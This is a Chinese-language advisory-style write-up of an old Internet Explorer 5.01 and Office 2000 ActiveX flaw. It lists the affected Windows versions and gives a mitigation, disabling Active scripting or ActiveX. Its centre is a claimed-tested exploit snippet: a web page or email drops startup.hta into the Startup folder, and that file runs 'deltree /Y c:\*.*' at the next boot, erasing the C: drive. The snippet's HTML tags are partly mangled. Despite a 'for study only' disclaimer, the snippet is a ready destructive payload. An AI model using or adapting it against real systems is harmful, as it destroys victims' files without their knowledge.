漏洞描述:

　　IE 5.01可以通过利用Excel和PowerPoint 2000的一些对象标记语言和HTML语言，在web页面上让浏览者执行命令。下面的例子将存为一个对象，它将自动储存一个Excel或者Powerpoint文件，在远程浏览者的硬盘上面, 而且加入启动文件夹，在下一次用户启动计算机时被执行。如果该文件为*.hta后缀的文件，可以执行任意的系统实用程序。

　　以下有一段由诅咒力量提供的代码，并已经通过测试。当打开含有以下这段代码的网页或邮件时（不需下载任何附件），下一次开机你C盘上所有文件将被删除！

（注：代码仅供学习研究之用，切勿用作非法用途！）
OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr>/OBJECT>/P>
SCRIPT>
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\startup.hta";
scr.Doc=object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>/object>SCRIPT>wsh.Run('start /m deltree /Y c:\*.*');alert('你C盘上的文件正在被删除！');/"+"SCRIPT>";
scr.write();
/SCRIPT>

　　该代码被执行时，将在“启动”目录中建立文件startup.hta，该文件在下次开机时执行，内容为执行DOS命令deltree /y c:\*.*。由于绝大多数防火墙都不会监测“启动”目录中的文件变动，因此该程序的隐身性极高，非常危险。

漏洞影响的系统包括：

Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000
Microsoft PowerPoint 2000
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000

解决方法:

　　禁用Active脚本或者ActiveX。